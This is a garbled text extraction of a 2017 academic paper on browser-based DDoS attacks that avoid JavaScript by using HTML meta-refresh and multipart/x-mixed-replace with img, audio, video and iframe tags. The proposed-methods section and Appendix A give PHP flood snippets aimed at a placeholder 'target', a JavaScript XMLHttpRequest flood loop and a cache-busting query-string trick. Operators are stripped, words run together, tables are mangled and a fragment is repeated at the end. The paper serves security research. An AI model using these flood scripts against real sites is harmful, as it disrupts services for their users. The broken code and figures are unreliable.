Transcription
(IJACSA) International Journal of Advanced Computer Science and Applications,Vol. 8, No. 12, 2017Browser-Based DDoS Attacks without JavascriptRyo KamikuboTaiichi SaitoGraduate Schoo of EngineeringTokyo Denki UniversityTokyo, JapanTokyo Denki UniversityTokyo, JapanAbstract—Recently, browser-based distributed denial ofservice (DDoS) attacks, in which a malicious JavaScript programis distributed through an advertisement network, and runs in thebackground of the web browser, were observed. In this paper, weaddress a question whether browser-based DDoS attacks can berealized without JavaScript. We construct new browser-basedDDoS attacks based only on HTML functions, and compare themwith the existing JavaScript-based DDoS attacks in efficiency. In March 2015 DDoS attacks targeting Github andGreatFire.org occurred [4]. According to reports byGreatFire and Github, it was up to 2.6 billion (req / s),because JavaScript loaded on the web site using Baidu'saccess statistics service was replaced by JavaScript thatgenerates a request for the target web site In response tothe request, it was said that the failure occurred for upto five days.Keywords—Browser; denial of service (DoS); distributed denialof service (DDoS); attacks; HTML; JavaScript; botnets; networks In September 2015 DDoS attacks targeting US SecurityCompany CloudFlare occurred [3]. CloudFlare reportsthat this attack supplied a maximum of 275,000 (req/s)requests. In addition, according to CloudFlare report,attacks were delivered through advertising networks,which led to attack pages with malicious JavaScript.I.INTRODUCTIONA denial of service (DoS) attack is an attack to make aservice unavailable to users by exhausting resources for theservice. Especially, when the attack is performed by numerousdevices distributed over wide area, it is called distributed denialof service (DDoS) attack. Traditional DDoS attacks areperformed in lower layers (Layer 3/4). An attacker makes amalware infect devices and the infected devices send manypackets of the lower layer to a target machine, by commandsfrom the command and control (C&C) servers. The infecteddevices are called bots and the network consisting of bots andC&C servers is called botnet. On the other hand, DDoS attacksperformed in the upper layer (Layer 7) have been observedrecently. One of the DDoS attacks in Layer 7 is a “browserbased DDoS attacks” in Fig. 1, which attacks use a normal webbrowser as a bot. The most simple and classic attack methodthat uses web browser is “F5 attack”, but the browser-basedDDoS attack is different from that.An example of browser-based DDoS attacks scenario isbased on abuses of advertisement. In the scenario,advertisements including malicious JavaScript that launchesDDoS attacks are distributed through the advertisementnetwork. When a user browses a page including theadvertisement, the script generates many requests to a targetedserver. Compared to traditional DDoS attacks, in this attackscenario, the client does not need to be infected with malwaresand attack is initiated simply by browsing an ordinary websiteon which the advertisement is placed. Furthermore, unlike "F5attack", the attack is done regardless of the intention of theuser. However, the attack is terminated by closing the webpageincluding the advertisement, and then attacks in this scenariohave no persistence. Although it seems that the degree of threatis low at first glance, there were cases of DDoS attacks thatactually abused the advertisement network.Here are two examples:Section 2 reviews related researches on browser-basedDDOS attacks. We propose an idea that considers how to formbotnets to perform browser-based DDoS attacks that exploit inSection 3. Sections 4 and 5 explain Web functions withoutJavaScript, and proposed attack methods. Section 6 mentionsexperimental results of previous and proposed attacks. Weconclude this paper in Section 7.Fig. 1. An example browser-based DDoS attacks.II. RELATED WORKSL. Kuppan suggests that there are possibilities of DDoSattacks by abusing HTML5 technologies in web browsers [1].Among them is an idea that browser-based DDoS attacks canbe realized by using XMLHttpRequestAPI and WebWorkers.G. Pellegrino et al. discuss the use of JavaScript functionsin browser-based DDoS attacks method [2]. They describeattacks that use the four APIs of XMLHttpRequestAPI [8], [9],WebSocketAPI [10], Server-Sent Event (SSE) API [11], andimageAPI [12]. Three JavaScript APIs among them are capable276 P a g ewww.ijacsa.thesai.org
(IJACSA) International Journal of Advanced Computer Science and Applications,Vol. 8, No. 12, 2017of sending HTTP requests per second enough for DDoS attacksand that XMLHttpRequest is the most efficient.III. BROWSER BOTNETWhile a traditional botnet is a network consisting of manyinfected devices, a browser botnet consists of web browsersthat load a page including malicious script. Unlike traditionalbotnet, it is not necessary for browser botnet to infect clientswith malware when it is acquired, and then botnet formation isinexpensive. On the other hand, if the browser window or tab isclosed, the attack by the browser is terminated and it has afeature of no persistence. In this section, we present an ideathat can be thought of as acquisition of browser botnet.Recently, several cases of DDoS attacks using browserbotnet composed of advertisement networks have beenobserved. The method of acquiring browser botnets by usingthe advertising network was proposed in Blackhat2013 [6].Web advertisement is installed in many web sites, and it can beused to prepare a large number of clients as a tool for DDoSattack from its features. The attack cost is much cheaper thanmalware botnets. According to research by J. Caballero et al.[7], there is a report that the cost per malware 1000 installationis 6 to 140. On the other hand, according to research G.Pellegrino et al. [2], the attack cost per day when attacking theadvertisement network is an average of 0.02. It is veryinexpensive compared with malware botnet formation.IV. HTML FUNCTIONS USED FOR ATTACKSIn order to do DDoS attack without using JavaScript, weuse dynamic document functions of HTML. The dynamicdocument function is a function that a web page automaticallytakes some action and changes the content of the web pagedynamically [5]. Usually it is used to create pages andanimations that change with time, such as stock priceinformation and weather forecast. Most standard browserssupport two different dynamic document functions, “clientpull” and “server push”.A. Client PullUsing client pull functions, the web browser can reload apage automatically and repeatedly after an interval. In thisresearch, we use a client pull function, “meta-refresh”.1) meta-refresh: If a value of meta http-equiv attributeis “refresh”, it causes refreshing pages[5]. Its basic usage is asfollows:1: meta http-equiv "refresh" content "1"2: url "http://example.com" The attribute content specifies the number of seconds towait before redirecting, and the attribute url specifies theredirect destination URL and if it is no specified, redirection tothe same page occurs.B. Server PushUsing server push functions, the server can transmit data tothe web browser at an arbitrary timing. Unlike client pull,server push maintains HTTP connection until all interactionsare finished. As a server push, we use “multipart/x-mixedreplace” in this research.Fig. 2. Multipart/x-mixed-replace.1) Multipart/x-mixed-replace: It is a special mime-typecontent type header in a server response. The server responseconsists of multiple parts delimited by a boundary characterstring, and the server can send each part separately [5]. Thebasic usage is as shown below, and the operation image is asshown in Fig. eplace;boundary End--EndContent-type: image/jpg tag src "http://example.com" --EndContent-type: image/jpg tag src "http://example.com" --EndA response is divided into multiple data blocks with theboundary character string determined by the boundaryattribute, and each part is sent separately. The browser receiveseach part and renders it, and after a new part is received, itreplaces the previously rendered part. This function can berepeatedly used by using the boundary character string.C. HTML TagsRequests used for DDoS attacks are generated with HTMLtags. In this research, experiments were carried out with thefollowing tags that have no restriction by the same originpolicy [13].1) img tag: Images can be displayed in the window byusing the img tag. The basic usage is as follows:1: img src " http://example.com/image.png" In addition to PNG/GIF/JPEG image format, a single PDF,etc. can also be specified with the src attribute. There arevarious other options.2) iframe tag: By using the iframe tag, you can embedan HTML page in the windows. The basic usage is as follows:1: iframe src " http://example.com" 277 P a g ewww.ijacsa.thesai.org
(IJACSA) International Journal of Advanced Computer Science and Applications,Vol. 8, No. 12, 2017Any HTML page specified by the src attribute can bedisplayed inline in the windows. There are various otheroptions.3) video tag: By using the video tag, we can handlemovies with standard HTML even without plugins like flash.Its basic usage is as follows:1: video src "http://example.com/video.mp4" controls 2: /video The video tag accepts various movie formats in the srcattribute. It has many options such as source and controlsattributes.4) audio tag: Audio tags can be used to embed audiocontent in documents. The basic usage is as follows:1: audio src " http://example.com/audio.mp3" controls 2: /audio Fig. 3. Multipart/x-mixed-replace attacking image.A. Attack MethodsWe specify the attack targeted by the src attibute of img tag. The function sleep() takes a small value to specify thenumber of seconds to wait before pushing. The number ofiteration of for-loop is set to a large value. We should becareful not to enlarge it too much, since browsers will becomeunstable when existing URL is specified in src.1) Attack using meta-refresh: Below is an example codefor an attack of the combination of meta-refresh and img tag. It is written in php and works in server.3) Attack using XMLHttpRequest: An example code forthe DDoS attack using XMLHttpRequest [8], [9] discussed inthe related research [2] is as follows:1:2:3:4:5:6:1: function sendxhr(){2: var xhr new XMLHttpRequest();3: xhr.open("GET","http://target",true);4: xhr.send();5: }6: var count 0;7: for (; count 99999;){8: sendxhr();9: count ;10: }The audio tag accepts various audio formats in the srcattribute. There are many options as well as other tags.V. PROPOSED ATTACK METHODSfor ( i 1; i 9999 ) {for ( j 1; j 9999 ) {print ' meta http-equiv "refresh" content 0.1 ';}print ' img src "http://target? '.(1000* i j).'"/ ';}In this code, we specify the attack target in the src attributein img tag. We set a sufficiently small value to the contentattribute, which is the number of seconds to wait, and set alarge value to the number of iterations. We should be carefulnot to enlarge it too much, since browsers will become unstablewhen existing data is specified in src.2) Attack using multipart/x-mixed-replace: Below is anexample code for an attack of the combination of multipart/xmixed-replace and img tag. It is written in php and worksin server. Fig. 3 is an attack image diagram where “Server”supplies a malicious advertisement through an Adnet.1: seperator "xxxxxxxxxxxxxx";2: ndary seperator");3: ob get flush();4: echo "-- seperator\n";5: for ( i 1; i 9999; i ) {6: echo 'Content-Type: text/html; charset utf-8;7: for ( j 1; j 100; j ) {8: echo ' img src "http://target? '.(1000* i j)."/ 9: /img ';10: }11: print "\n-- seperator\n";12: flush();13: sleep(1);14: }This code uses asynchronous GET request. The variablecount which is the number of repetitions takes a sufficientlylarge value.B. Improve EfficiencyIn the dynamic document function, if you simply set thesame attack target URL to the src attribute, the browser doesnot send the second and subsequent requests and shows theresponse of the 304 Not Modified HTTP status code [14],which is inefficient, as shown in Fig. 4. To avoid this, weattach a random query string to the end of the attack targetURL, as shown in Fig. 5.Fig. 4. No query string at the end of the URL.278 P a g ewww.ijacsa.thesai.org
(IJACSA) International Journal of Advanced Computer Science and Applications,Vol. 8, No. 12, 2017TABLE II.Results the unit is request per second [Req/s]FireFoxFig. 5. Random query string at the end of the URL.VI. EXPERIMENTSA. Experiment EnvironmentOur experimental environment is shown in Table 1.TABLE I.OSCPURAMExperiment EnvironmentClientWindows10Intel corei3-4160 3.6GHz*28GBServerUbuntu15.10Intel corei3-4130 o,Nmeta,audio,EXHRF5 .0111.0133.16.00152.97,2775.0031.00The experimental results are shown in Table II. Theabbreviations have the following meanings.multipart/x-mixed-replacem/xServer side software is Apache 2.4. Client softwares areFirefox49.0.1 and Chrome47.0.2526. We use the apachetopcommand on the server side to measure HTTP requests.meta-refreshmetaXMLHttpRequestXHRB. ResultsTable II shows the efficiency of the method usingXMLHttpRequest, our proposed Browser-based DDoS attackswithout JavaScript and the F5attack [15] in the sameenvironment. img tagimg iframe tagiframe video tagvideo audio tagaudioIn the case of Firefox, the highest request number of 155.0req/s can be issued on average in the combination of the"multipart/x-mixed-replace, audio tag, and existing URL".On the other hand, when the XMLHttpRequest proposed in therelated research [2] is reproduced in our experimentalenvironment, the average is 202.4 req/s, and it can be said thatJavaScript attack is more efficient.existing URLEno existing URLNIn the case of Chrome, the average number of requests of138.5 req/s can be issued in the combination of “meta-refresh, audio tag, and no existing URL”. On the other hand, theXMLHttpRequest proposed in the related research is 47.5req/s, and the result that the proposed method attack isoverwhelmingly efficient is obtained. Some combinations inthe proposed method did not operate on 8.512.0045.7629.97In this research, in Firefox, the attack efficiency of average55.0 req/s in the most efficient combination in the HTMLbased DDoS attack methods is inferior to that of average of202.4 req/s in the JavaScript-based DDoS method usingXMLHttpRequest. However, since the proposed attackmethods are HTML-based attacks that do not use JavaScript, itis possible for a web browser that disables JavaScript to be abot, and the acquisition of browser botnet is even easier.Therefore, even if the efficiency is inferior, they become athreat in acquiring more botnets.In the combination of “meta-refresh, audio tag, and noexisting URL”, it was possible to constantly generate manyHTTP requests both in Firefox and Chrome.A characteristic feature of the proposed method is that acombination with significant band occupancy was observed.Fig. 6. Multipart/x-mixed-replace, audio tag,exist data(Firefox).In case of existing URL, maximum bandwidth occupationis 100 Mbps for multipart/x-mixed-replace with audio tagand 38 Mbps for meta-refresh with video tag, as shown inFig. 6 and 7, respectively.Fig. 7. Meta-refresh, video tag,exist data(Firefox).279 P a g ewww.ijacsa.thesai.org
(IJACSA) International Journal of Advanced Computer Science and Applications,Vol. 8, No. 12, 2017VII. CONCLUSIONSIn this paper, we proposed browser-based DDoS attackmethods that are new methods of browser-based DDoS attacksand do not use JavaScript. Using the dynamic documentfunctions of HTML, we showed in the experiment thatbrowser-based DDoS attack is possible even when JavaScriptis disable, and compared and evaluated them with the methodproposed in the related research. In Firefox, efficiency was notbetter than XMLHttpRequest proposed in related research.Chrome, on the other hand, attained more attack efficiencythan XMLHttpRequest. The experimental results showed thatthe efficiency of the same browser varies depending on thecombination of HTML functions and tags in the proposedmethod, and even with the same combination, the experimentshows that efficiency varies depending on the browser. Sincewe examined our proposed attack methods only in two desktopversion web browsers, Firefox and Chome, we will alsoexperiment with other web browsers (e.g. IE/Edge, Opera) andmobile version web browsers. We will investigate other webfunctions for browser-based DDoS attacks and mitigationmethods for our ]REFERENCESL. Kuppan, "Attaching with HTML5," Black Hat 2010, L.A., USA, July.2010.G. Pellegrino, C. Rossow, F. J. Ryba, T. C. Schmidt, and M. Wahlisch,"Cashing out the Great Cannon? On Browser-Based DDoS Attacks andEconomics," The 9th USENIX Workshop on Offensive Technologies(WOOT '15), D.C., USA, Aug. 2015.Marek Majkowski, "Mobile Ad Networks as DDoS Vectors: A CaseStudy," Cluodflare report, Sept. 2015.B. Marczak, N. Weaver, J. Dalek, R. Ensafi, D. Fiflield, S. McKune, A.Rey, J. S. Railton, R. Deibert, and V. Paxson, "China’s Great Cannon,"MUNK SCHOOL OF GLOVAL AFFAIRS UNIVERSTY OFTORONTO, Apr. 2015Shishir Gundavaram, "CGI Programming on the World Wide Web,"O'REILLY, 1996, pp.138-141.J. Grossman and M. Johansen, "Million Browser Botnet," Black Hat2013, L.A., USA, July. 2013.J. Caballero, C. Grier, C. Kreibich, and V. Paxson, "Measuring Pay-perInstall: The Commoditization of Malware Distribution," USENIXSecurity '11, C.A., USA, Aug. 2011.D. Flanagan, " JavaScript 6th," O'REILLY, 2012, pp.535-563.A. V. Kesteren, J. Aubourg, J. Song, and H. R. M. Steen,"XMLHttpRequest Level 1," W3C Standard, Oct. 2016.Internet Engineering Task Force(IETF) Request for Comments(RFC)6455, "The WebSocket Protocol," ISSN 2070-1721, Dec. 2011.I. Hickson, "Server-Sent Events," W3C Recommendation, Jan. 2015.S. Faulkner, A. Eicholz, T. Leithead, A. Danilo, and S. Moon,"HTML5.2," W3C , Dec. 2017.M. Smith, " HTML: The Markup Language," W3C Working draft,May 2011.[14] Internet Engineering Task Force(IETF) Request for Comments(RFC)2616, " Hypertext Transfer Protocol -- HTTP/1.1," Dec. 2011[15] Takeshi Yatagai, Takamasa Isohara, and Iwao Sasase, "Detection ofHTTP-GET flood Attack Based on Analysis of Page Access Behavior,"in IEEE Pacific Rim Conference on Communications, Computers andSignal Processing(PACRIM), pp. 232-235, Sept. 2007APPENDIX AWe give some examples of combinations of the proposedDDoS attack methods indicated by our attack methods inSection 5. Meta-refresh, audio tag, existing URL1: for ( i 1; i 9999 ) {2: for ( j 1; j 9999 ) {3: print ' meta http-equiv "refresh" content 0.1 ';4: }5: print ' audio src "http://target/audio.mp4?'.(1000* i j).'"/ ';6: } Meta-refresh, iframe tag, no existing URL1: for ( i 1; i 9999 ) {2: for ( j 1; j 9999 ) {3: print ' meta http-equiv "refresh" content 0.1 ';4: }5: print ' iframe src "http://target/noexsiting?'.(1000* i j).'"/ ';6: } Multipart/x-mixed-replace, video tag, no existingURL1: seperator "xxxxxxxxxxxxxx";2: ndary seperator");3: ob get flush();4: echo "-- seperator\n";5: for ( i 1; i 9999; i ) {6: echo 'Content-Type: text/html; charset utf-8;7: for ( j 1; j 100; j ) {8: echo ' video src "http://target/noexisting'.(1000* i j)."/ 9: /video ';10: }11: print "\n-- seperator\n";12: flush();13: sleep(1);14: }APPENDIX BA Table II of Section 6 is shown in Fig. 8. Fig. 8 shows theefficiency of the method using XMLHttpRequest, our proposedBrowser-based DDoS attacks without JavaScript and theF5attack in the same environment.Fig. 8. Results.280 P a g ewww.ijacsa.thesai.org
recently. One of the DDoS attacks in Layer 7 is a “browser-based DDoS attacks” in Fig. 1, which attacks use a normal web browser as a bot. The most simple and classic attack method that uses web browser is “F5 attack”, but the browser-based DDoS attack is different from that. An example of browser-based DDoS attacks scenario is
